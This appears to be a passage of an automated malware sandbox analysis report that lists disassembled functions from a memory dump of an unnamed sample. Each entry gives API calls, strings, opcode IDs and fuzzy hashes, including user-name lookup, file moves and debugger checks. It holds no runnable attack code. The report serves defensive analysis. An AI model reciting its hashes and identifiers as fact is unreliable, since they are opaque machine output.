                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: p2Q
                                                                                                  • API String ID: 2102423945-1521255505
                                                                                                  • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                  • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                                                                                                  • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                  • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove_strtok
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446180046-0
                                                                                                  • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                                  • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                                                                                  • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                                  • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 2974526305-0
                                                                                                  • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                                  • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                                  • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                                  • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                                  • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                  • String ID:
                                                                                                  • API String ID: 3058430110-0
                                                                                                  • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                  • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                                  • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                  • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1421093161-0
                                                                                                  • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                                  • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                                  • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                                  • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004C7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                                                                                    • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                                                                                    • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                                                                                  • CallCatchBlock.LIBCMT ref: 004C70F8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                  • String ID:
                                                                                                  • API String ID: 2901542994-0
                                                                                                  • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                                                                                                  • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004253B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                                                                                                    • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                                                                                                  • __calloc_crt.LIBCMT ref: 00425A01
                                                                                                    • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                                                                                                  • __lock.LIBCMT ref: 00425A37
                                                                                                  • ___addlocaleref.LIBCMT ref: 00425A43
                                                                                                  • __lock.LIBCMT ref: 00425A57
                                                                                                    • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                  • String ID:
                                                                                                  • API String ID: 2580527540-0
                                                                                                  • Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                                                                                  • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                                                                                                  • Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                                                                                  • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                                  • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32 ref: 004127B9
                                                                                                  • _malloc.LIBCMT ref: 004127C3
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _memset.LIBCMT ref: 004127CE
                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2824100046-0
                                                                                                  • Opcode ID: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                                                                                                  • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                                  • Opcode Fuzzy Hash: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                                                                                                  • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00412800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32 ref: 00412806
                                                                                                  • _malloc.LIBCMT ref: 00412814
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _memset.LIBCMT ref: 0041281F
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2824100046-0
                                                                                                  • Opcode ID: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                                                                                                  • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                                                                                                  • Opcode Fuzzy Hash: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                                                                                                  • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                  • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                                  • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                  • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00470040 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\asn1\tasn_new.c
                                                                                                  • API String ID: 2102423945-2878120539
                                                                                                  • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                  • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                                                                                                  • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                  • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                  • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                                                                                  • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                  • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                                                                                    • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                                                                                                    • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                                                                                                    • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                                                                                                    • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                                                                                                    • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                    • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                    • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                                                                                  • TranslateMessage.USER32(?), ref: 0041B4CD
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041B4D7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                  • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                  • API String ID: 441990211-897913220
                                                                                                  • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                  • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                                                                                  • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                  • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .\crypto\err\err.c$unknown
                                                                                                  • API String ID: 0-565200744
                                                                                                  • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                  • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                                  • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                  • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0042419D
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DebuggerPresent_memset
                                                                                                  • String ID: i;B
                                                                                                  • API String ID: 2328436684-472376889
                                                                                                  • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                  • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                                                                                  • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                  • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                                  • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                  • String ID: 8Q
                                                                                                  • API String ID: 3761405300-2096853525
                                                                                                  • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                  • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                                  • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                  • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                                    • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                  • _memset.LIBCMT ref: 00413C83
                                                                                                  Strings
                                                                                                  Memory Dump Source
